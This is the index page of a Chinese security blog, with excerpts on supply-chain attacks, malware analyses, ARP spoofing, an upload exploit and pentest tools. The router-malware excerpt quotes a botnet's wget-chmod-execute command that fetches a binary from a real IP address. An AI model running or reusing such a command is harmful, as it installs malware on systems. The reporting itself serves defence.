蛋壳博客 - 网络安全博客

蛋壳博客 - 网络安全博客 蛋壳博客 - 网络安全博客

最新文章

暂无分类

关于网站投稿

1

蛋壳 发布于 7-14

  投稿邮箱: 1619769881@qq.com 投稿说明:1.软件不准带有后门、病毒、软件验证更新,广告等2.必须是本人原创需带本站版权:蛋壳博客http://www.dankeanquan.com3.不多次向各大平台投稿如补天,乌云(不存在),52破解4.投稿邮件包含三项支付宝收款码微信收款码银行卡号...

阅读(644) 评论(0 )

业内新闻

开源软件的供应链安全吗?黑客正在利用源代码传播恶意软件

蛋壳 发布于 9-7

过去一年里,发生了一连串开源软件遭受供应链攻击的事件,并且态势愈演愈烈。就在最近,甚至发现2个独立的后门漏洞进入了数十万服务器管理员下载的库中。第一个曝光的后门来自Webmin,这是一个安装量超过100万,基于Web的管理工具。根据Webmin开发人员JamieCameron称,去年4月左右,攻击者破坏了用于开发新版本程序的服务器。然后,恶意使用...

阅读(31) 评论(0 )

业内新闻

漏洞扫描技巧之Web漏洞扫描器研究

3

蛋壳 发布于 9-7

0×00前言 之前我们简单介绍了一下扫描器中爬虫的部分,接下来将继续介绍一下扫描器中一些我们认为比较有趣的技巧。0×01编码/解码/协议在很久以前有人提问AMF格式的请求怎么进行检测,或者有什么工具可以检测。既然我们要讲解的是 Web漏洞扫描器,那么就先假设是AMFoverHTTP(这里并不需要你了解AMF,你只需要知道AMF...

阅读(28) 评论(0 )

业内新闻

一例信息窃取木马分析报告

44

蛋壳 发布于 9-7

一、前言近日,中兴通讯高级邮件防御系统捕获一例病毒样本。通过分析发现,该样本会通过进程替换等方式释放,并在傀儡进程中运行AgentTesla木马以达到信息窃取的目的。以下是对该样本的分析。二、样本简介该样本为Autoit3编写的exe文件:反编译出部分脚本,脚本做了较强的混淆:脚本使用了多种混淆手法,如常数被转换成数学运算、无用的随机变量赋值、调...

阅读(22) 评论(0 )

业内新闻

三款恶意软件同时目标锁定路由器

蛋壳 发布于 9-1

Neko7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被TrendMicro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:“cd/tmp/;wgethxxp://185.244.25.200/bins/x86.neko;chmod777x86.neko;./x86...

阅读(36) 评论(0 )

暂无分类

ARP欺骗常见姿势及多机ARP欺骗

蛋壳 发布于 8-28

0×00前言ARP欺骗是一个老生常谈的话题,翻看各位师傅的文章,大多数都是在使用arpspoof(当然,同样看到过使用Python写一款类似的工具的文章)进行单机欺骗。本文的目的在于总结ARP欺骗原理、常见姿势以及实现多机ARP欺骗。0×01ARP帧格式DSTSRC长度或类型硬件类型协议类型硬件大小协议大小Op发送方的硬件地址(MAC地址)发送方...

阅读(34) 评论(0 )

渗透测试

一个任意文件上传漏洞的复现、分析、利用与防御建议

10

蛋壳 发布于 8-27

前言CMSMadeSimple(CMSMS)是一个简单、便捷且易用的内容管理系统。前面一篇文章,我们讲述了关于其中一个基于时间的SQL注入漏洞的复现、分析及利用过程。本文详细讨论CMSMS中的另一个漏洞,也是Web安全中较为常见的一种漏洞类型。ShowTime2是CMSMS中比较常用的模块,主要用于上传水印图片。该模块在3.6.2及之前的版本中,...

阅读(49) 评论(0 )

文章分享

“暗度陈仓”病毒分析报告

18

蛋壳 发布于 8-27

一、“暗度陈仓”病毒概述1.1病毒介绍换机精灵软件从表面看为一款为用户提供备份手机信息的应用软件,但在实际运行中它获取了大量权限,这些权限申请起来极为勉强,同时会私自获取用户软件以及硬件信息进而判断手机内的安全软件情况,留下远程控制的暗门用来下载恶意APK,同时模拟用户点击浏览器,达到刷流量的目的,其中下图所示为该病毒的运行界面图1-1换机精灵运...

阅读(35) 评论(0 )

业内新闻

Hickory智能门锁存在的多个漏洞

7

蛋壳 发布于 8-27

近期,Rapid7安全研究团队发现了Hickory蓝牙智能系列BlueToothEnabledDeadbolt款式门锁存在多个安全漏洞,漏洞涉及其移动端APP应用和云托管的Web服务和MQTT协议。截至漏洞披露期限前,Hickory官方还未对这些漏洞作出认可,也未发布任何补丁或漏洞修复措施。HickorySmartBluetoothEnabled...

阅读(36) 评论(0 )

文章分享

用于监控USB设备连接事件的取证工具

2

蛋壳 发布于 8-27

描述usbrip是纯Python3编写的一个小软件(使用一些外部模块,参见Dependencies/PIP),它会通过解析Linux的日志文件(/var/log/syslog*or/var/log/messages*取决于发行版本)来构建USB事件历史表格,其中可能包含的内容有:“已连接”(日期和时间),“User”,“VID”(供应商ID),“...

阅读(26) 评论(0 )

文章分享

记一次勒索病毒的攻防

18

蛋壳 发布于 8-27

一、现场话说3.14号早上,小Z像平常一样来到公司,发现一帮同事在一台电脑前围观,不过各个表情诧异的样子,他也好奇的凑过去看看有啥新奇的,电脑里除了系统文件,无一例外被加了Tiger4444的后缀。中勒索病毒了。小Z心里咯噔一下,明明之前做了很多的防守动作,为什么还是中招了?二、监控平台这里先卖个关子,先看下小Z搭建的安全监控平台。日志平台,原理...

阅读(17) 评论(0 )

程序源码

VulnX:一款针对CMS的漏洞检测工具和自动Shell注入工具

4

蛋壳 发布于 8-22

VulnX是一款自动化Shell注入工具,支持多种类型的内容管理系统,其中包括Wordpress、Joomla、Drupal和Prestashop等等,广大研究人员可以使用VulnX来检测这些CMS系统中的安全问题。VulnX本质上是一款智能化Bot,可实现Shell自动注入,并帮助研究人员检测CMS系统中的安全漏洞。它可以执行快速CMS安全检测...

阅读(20) 评论(0 )

程序源码

论Nmap中一些常用的NSE脚本

9

蛋壳 发布于 8-22

在这篇文章中,我们将研究最著名的渗透工具之一Nmap一款标志性的跨平台扫描器。它的原意为NetworkMapper(网络映射器),具有相当强大的扫描功能,几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描,Nmap还可根据NSE(NmapscriptingEngine)的脚本进行大量渗透工作,这种脚本是基于Lua编...

阅读(23) 评论(0 )

文章分享

Trickbot银行木马变种分析

9

蛋壳 发布于 8-22

概述我们一直在跟踪Trickbot银行木马活动,最近在垃圾邮件中发现了一个Trickbot变种(TrojanSpy.Win32.TRICKBOT.TIGOCDC),其中包含带启用宏的MicrosoftWord文档。单击文档后,它会执行一个混淆的JS文件,并下载Trickbot作为其有效负载。此恶意软件还会检查受影响计算机中正在运行的进程数,如果它...

阅读(13) 评论(0 )

程序源码

Project-Black:渗透中进行Scope控制或扫描和进度追踪的工具

14

蛋壳 发布于 8-22

project-black是一个用于在渗透中进行Scope控制、扫描和进度追踪的工具。目的该项目旨在鼓励在渗透测试或bugbounty,进度跟踪,常规扫描方面可以更有条理的进行工作。它可以为你启动以下工具:masscannmapdirsearchamasspatator根据你的工作范围,将数据存储在一个表单中。对项目数据执行有用的筛选过滤,例如:...

阅读(18) 评论(0 )


sitemap